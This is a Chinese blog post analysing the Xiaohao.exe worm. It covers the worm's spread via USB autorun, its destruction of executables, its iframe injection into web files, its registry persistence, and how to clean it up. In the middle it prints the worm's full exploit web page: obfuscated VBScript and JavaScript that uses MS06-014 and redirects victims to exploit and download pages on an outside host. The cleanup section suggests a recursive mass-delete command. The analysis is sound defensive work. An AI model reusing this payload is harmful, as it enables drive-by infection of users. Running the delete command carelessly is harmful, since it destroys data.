Xiaohao.exe(Virus.Win32.Agent.o)

╃反病毒频道=- 专栏收录该内容
6 篇文章 0 订阅

文件名称:Xiaohao.exe

文件大小:12288 bytes

AV命名:Virus.Win32.Agent.o(瑞星)

加壳方式:UPX 0.89.6 - 1.02 / 1.05 - 1.24

编写语言:Microsoft Visual C++ 6.0

病毒类型:蠕虫

文件MD5:B50ED06B61CDCF060D0136784999E50C

文件SHA1:ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD

传播方式:U盘等移动介质、网页漏洞。

1、释放病毒文件:

%Systemroot%/system32/dllcache/dvdplay.exe

%Systemroot%/system32/OLDA.tmp

%Systemroot%/system32/exloroe.exe

其中主体Xiaohao.exe常驻进程。

2、尝试启动C:/Program Files/Internet Explorer/iexplore.exe,不过未见其他行为。

3、Xiaohao.exe查找可用的磁盘,在其目录下生成:Xiaohao.exe和Autorun.inf

如双击磁盘,则激活病毒。

(如果在插入U盘情况下,运行被感染的病毒,那么U盘目录会生成Xiaohao.exe和Autorun.inf)

4、遍历磁盘所有文件,如遇到.exe文件则覆盖,并在文件尾增加感染标记“ygr”

覆盖文件头部,导致可执行文件结构被破坏。文件全部变成一个“浩”字

由于无判断路径,系统文件也被破坏了,重启后可能无法开机。

并且一些系统设置和配置失效,例如系统时间会被修改。

5、查找扩展名为*.jsp、*.php、*.aspx、*.asp、*.html、*.htm文件。插入一段代码:

<ifrae src=h**p://xiaohao.yona.biz/xiaohao.htm width=0 height=0></ifram>

代码:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>IE 0Day</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
function detectOS()
{
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
{
OS = "Windows XP";
}
else
{
if(navigator.userAgent.indexOf("Windows NT 5.2") != -1)
{OS = "Windows 2003";}
else
{OS = "Windows 2000";}
}
return OS;
}
function MakeItSo()
{
if(detectOS() == "Windows XP")
{
//2YWwO5M3N*xp,V4PPxp5DMS07-004MxBm
window.location.href="baobao.htm";
}
else {if(detectOS() == "Windows 2003")
{
//2YWwO5M3N*2003
window.location.href="zhu3.htm";
}
else
{
//2YWwO5M3N*2K,V4PP2K5DMS07-004MxBm
window.location.href="banner.htm";
}
}
}
</SCRIPT>

<SCRIPT language=VBScript>
on error resume next
Set downf = document.createElement("object")
downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"
str="Microsoft.XMLHTTP"
Set O = downf.CreateObject(str,"")
if Not Err.Number = 0 then
err.clear
//C;SPMS06-014B)64,5Ck:sEP6O2YWwO5M3@`PMV4PP2;M,5DMS07-004MxBm
document.write("<scr"&"ipt language=""javascript"">window.setTimeout(""MakeItSo()"",5000);</sc"&"ript>")
else
//SPMS06-014B)64,V4PP06-0145DMxBmad.htm
document.write("<iframe width=""0"" height=""0"" src=""zhu3.htm""></iframe>")
end if
</SCRIPT>
<script src=yun.js></script>
<SCRIPT language=javascript type=text/javascript>
var cookieString = document.cookie;
var start = cookieString.indexOf("woshi0day=");
if (start != -1)
{}
else
{
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
document.cookie = "woshi0day=Ms06-046;expires=" + expires.toGMTString();
document.write("<iframe width=0 height=0 src=baobao.htm></iframe>");
}</SCRIPT>
</BODY></HTML>

由操作系统版本判断,决定跳转的网页。

首先检测是否存在MS06-014漏洞,若有,则跳至h**p://xiaohao.yona.biz/zhu3.htm

如无意外,可获样本:h**p://xiaohao.yona.biz/xiaohao.exe(就是那个主角拉``)

若无MS06-014漏洞,则跳至h**p://xiaohao.yona.biz/baobao.htm.

代码以十进制加密```解密后得一只0day,应该是ANI的马``=。=

连接已失效``(晕)

时间关系,不深入分析咧```=。=

6、修改注册表(不记得哪里,哈哈``),删除开始菜单的快捷方式。

7、修改进程窗口标题,为:已中毒 X14o-H4o's Virus

8、如病毒在进程,在进入一个目录后,所有文件(被感染文件除外)属性皆被设置为隐藏!

9、破坏显示隐藏文件,设置为“不显示”。

10、写入注册表,开机自启:

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Active Setup/Installed Components/

指向%SystemRoot%/system32/exloroe.exe

(汗,这一步绝对多余了,因为系统根本启动不了!)

11、保存被感染的文件列表,则C:/Jilu.txt

狂汗``有1M多!

没有解决方法哈```重启后系统不能启动,呵呵

只能重装``

1、C盘格掉,重装系统后,删除每个磁盘下的Xiaohao.exe和Autorun.inf。

记住,不要双击进入啊,不然一切又白费了,建议用Winrar或CMD下删除。

2、不要运行C盘外的任何程序,直接网上下载杀毒软件,升级之``全盘扫

3、还有那些被插代码的网页文件。。

由于是重装,系统补丁没打``如果不小心运行,可能病毒又来了`` T T

可以下载个批量删除代码的工具哈``杀软也应该可以吧?

或者干脆:

Del *.htm /s/q

*.htm自己换成其他网页格式文件哈。

===========================================

也可以在DOS下用光盘杀毒啊,前提是杀软能识别。

===========================================

PS:

这种病毒破坏性非常大,建议打齐系统补丁,及时升级杀软!!

杀软如有主动防御功能更好``没有的话,去下个HIPS辅助``

还有```不明的网站就不要进拉~~

 
  • 0
    点赞
  • 0
    评论
  • 0
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2021 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值